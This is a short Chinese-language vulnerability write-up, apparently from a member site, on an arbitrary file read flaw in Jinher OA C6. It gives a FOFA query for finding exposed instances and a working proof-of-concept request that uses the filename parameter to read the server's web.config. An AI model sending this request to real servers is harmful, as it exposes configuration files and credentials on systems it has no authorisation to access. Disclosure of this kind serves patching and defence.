金和OA_C6_download.jsp_任意文件读取漏洞-棉花糖会员站

# 金和OA C6 download.jsp 任意文件读取漏洞

## 漏洞描述

金和OA C6 download.jsp文件存在任意文件读取漏洞，攻击者通过漏洞可以获取服务器中的敏感信息

## 漏洞影响

> 金和OA

## FOFA

> app=”Jinher-OA”

## POC

界面如下

![1](/static/qingy/金和OA_C6_download.jsp_任意文件读取漏洞/img/1.png)

漏洞产生文件为 download.asp

![2](/static/qingy/金和OA_C6_download.jsp_任意文件读取漏洞/img/2.png)

##POC构造

“`
/C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=/c6/web.config
“`

![3](/static/qingy/金和OA_C6_download.jsp_任意文件读取漏洞/img/3.png)

文章版权归作者所有，未经允许请勿转载。

THE END

金和OA_C6_download.jsp_任意文件读取漏洞